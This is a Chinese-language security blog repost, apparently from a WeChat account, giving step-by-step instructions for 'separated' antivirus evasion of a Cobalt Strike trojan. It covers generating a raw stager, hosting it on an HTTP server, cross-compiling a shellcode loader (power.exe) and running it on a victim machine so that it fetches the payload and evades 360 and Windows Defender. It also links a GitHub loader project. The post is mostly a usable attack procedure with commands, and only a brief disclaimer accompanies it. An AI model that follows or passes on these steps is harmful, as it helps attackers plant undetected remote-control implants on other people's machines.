CS木马分离免杀实操(过360,火狐和WindowsDefinder)(4月2日更新)

admin 2024年4月4日14:26:54评论36 views字数 943阅读3分8秒阅读模式

===================================

免责声明

请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。工具来自网络,安全性自测,如有侵权请联系删除。

0x01 工具介绍

分离免杀:木马加载器和payload载荷分开,仅仅上传制作的好的加载器即可,通过对加载器的控制,使其加载放置在远程服务器上的木马。当然也并非使用自己制作的木马加载器,像白加黑(白程序,黑DLL),这种依靠系统执行DLL的方式,更加有效,但需要找到能够利用的dll文件,还有存在其他的限制,以后有机会分享一下。

实操环境:Linux : CS 服务端(192.168.1.220)Win11 : CS 客户端(192.168.1.212)Win 7 : 实验受害者(192.168.1.57)

0x02 安装与使用

1.Linux开启CS服务端,选择阶段载荷,点击ram,生成 .bin 后缀格式payload。

CS木马分离免杀实操(过360,火狐和WindowsDefinder)(4月2日更新)

2. 将生成的payload 放置在linux CS服务端主机上,任意文件夹都可以,在该文件夹中开启http服务(一般使用python就可以了)命令:python3 -m http.server 8880 (这里注意一下python3和python2开启http服务不同,根据自己环境来)。

CS木马分离免杀实操(过360,火狐和WindowsDefinder)(4月2日更新)

3. 加载器的准备:使用命令(文件muma.cpp,文章底部链接下载即可):x86_64-w64-mingw32-g++ –static -o power.exe muma.cpp -fpermissive -lws2_32 生成 power.exe 加载器,将加载器上传至受害机Win 7 中。

CS木马分离免杀实操(过360,火狐和WindowsDefinder)(4月2日更新)

4. 免杀测试:将加载器power.exe 上传至 受害机后,开启各类EDR,尝试上线CS,命令:power.exe 192.168.1.220 8880 payload_x64.bin ,CS成功上线,且正常执行命令。

CS木马分离免杀实操(过360,火狐和WindowsDefinder)(4月2日更新)
CS木马分离免杀实操(过360,火狐和WindowsDefinder)(4月2日更新)5. 下载链接:Github项目地址:https://github.com/xjsafe/ShellCode_Loader
0x03

原文始发于微信公众号(Web安全工具库):CS木马分离免杀实操(过360,火狐和WindowsDefinder)(4月2日更新)

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年4月4日14:26:54
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   CS木马分离免杀实操(过360,火狐和WindowsDefinder)(4月2日更新)https://cn-sec.com/archives/2630694.html

发表评论

匿名网友 填写信息